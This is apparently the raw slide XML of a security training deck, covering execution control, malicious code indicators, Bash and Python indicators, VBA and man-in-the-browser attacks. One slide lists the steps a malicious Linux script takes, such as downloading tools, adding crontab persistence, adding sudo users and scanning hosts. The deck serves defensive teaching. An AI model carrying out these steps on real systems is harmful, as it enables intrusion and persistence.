                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-27542" y="1716677"/>
                  <a:pt x="20230" y="1665469"/>
                  <a:pt x="0" y="1438849"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-20230" y="1212229"/>
                  <a:pt x="26023" y="1114954"/>
                  <a:pt x="0" y="1022340"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-26023" y="929726"/>
                  <a:pt x="56249" y="690865"/>
                  <a:pt x="0" y="530102"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-56249" y="369339"/>
                  <a:pt x="10678" y="202192"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1094864312">
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <ask:type>
                    <ask:lineSketchScribble/>
                  </ask:type>
                </ask:lineSketchStyleProps>
              </a:ext>
            </a:extLst>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="-342900" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ED1C24"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="857250" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ED1C24"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1200150" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1350"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1543050" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1350"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1885950" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2228850" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2571750" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2914650" indent="-171450" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>fullname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>name,surname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>   return name + " " + surname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>#This ends the function definition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>#The next line calls the function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>greeting = 'Hello ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>fullname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>('World', '')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>print(greeting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174386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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Prevent use of unauthorized code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow lists and block lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow list control means that nothing can run if it is not on the approved list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Block list control means that anything not on the prohibited list can run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11266" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80FE6442-19D1-45D9-862E-B513287B7E20}"/>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id="{36DD1DD5-B917-4B82-98C0-3470771FE8B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2821880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2833-DC52-4EC5-B230-EDFAFA37D61F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious Code Indicators</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F07F4BA2-4D9A-4DE6-8C96-734CD2078507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="836762"/>
            <a:ext cx="8373613" cy="3373573"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection through monitoring platforms or host/process behavior analysis. The main types of malicious activity:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shellcode - Creates a process or injects a DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential dumping—the malware might try to access the credentials file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Lateral movement/insider attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – restarting backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62219755-A207-4150-933C-D355994C6E5B}"/>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id="{3E3B1D3F-49C0-4CFD-AE39-2EA6AC398A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359830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66C610-329D-4D3A-A4FE-4516F361A429}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341923" y="621792"/>
            <a:ext cx="8232536" cy="3680703"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Bash)- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Bourne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> Again Shell - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Batch scripting for Linux command-line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>A malicious script running on a Linux host might attempt the following: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>1. Use commands such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/route to establish the local context. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>2. Download tools, possibly using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> or curl. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>3. Add crontab entries to enable persistence. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>4. Add a user to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> and enable remote access via SSH. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>5. Change firewall rules using iptables. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>6. Use tools such as Nmap to scan for other hosts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious indicators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reconnaissance-type activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account/firewall configuration changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476B7896-1D6D-4325-A05A-6F35125560ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Bash and Python Malicious Indicators</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9DCB776-4ABA-489D-85EE-024CF7C669B5}"/>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id="{FBFEC257-1677-4060-AF32-37E6AA6F1317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189874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E9BD5-5BB3-4315-8B67-999C7BECC21F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Visual Basic for Applications (VBA)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{295A3002-ECCC-4C37-A52D-747B9847A62A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>VBA stands for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>isual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>asic for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>pplications, an event-driven programming language from Microsoft. It is now predominantly used with Microsoft Office applications such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>MSExcel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, MS-Word and MS-Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CABFB695-38CA-4E12-8A7B-FC6CE0F5ECD5}"/>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id="{744B094E-A5CD-402A-AB44-B9EFBA3CEE70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4251776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GB" dirty="0"/>
              <a:t>Man-in-the-Browser Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FF04E32-A2B9-4B36-A648-BE4E2425B9CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706803" y="508225"/>
            <a:ext cx="4291632" cy="3376241"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Compromise browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Inspect session data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Change browser settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Perform redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Perform code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Malicious plug-in/script/DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Browser Exploitation Framework (BeEF) window showing a hooked browser at IP address 10.1.0.101 and details of browser software, version, and loaded plug-ins.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4642722A-9B19-44AF-B3A0-9827C9FBF34F}"/>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41927" y="936687"/>
            <a:ext cx="4291632" cy="267388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47DC4A29-6DA5-4CB8-8D0E-DE886254EC33}"/>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id="{9267EFEA-C148-466F-AA21-04F239D1EED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B7CF8A19-3A9E-4ABC-B336-2FDDE321C72D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8EAE692-C8D9-40D9-936C-875E6CF768CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240126" y="4227008"/>
            <a:ext cx="3401893" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Screenshot: Browser Exploitation Framework (beefproject.com).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="722320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AB138-DEDB-4C22-9170-99CBAE03FA2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summarize Deployment and Automation Concepts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9659630B-196C-42D9-87EE-C9962EB702B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Topic 14E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
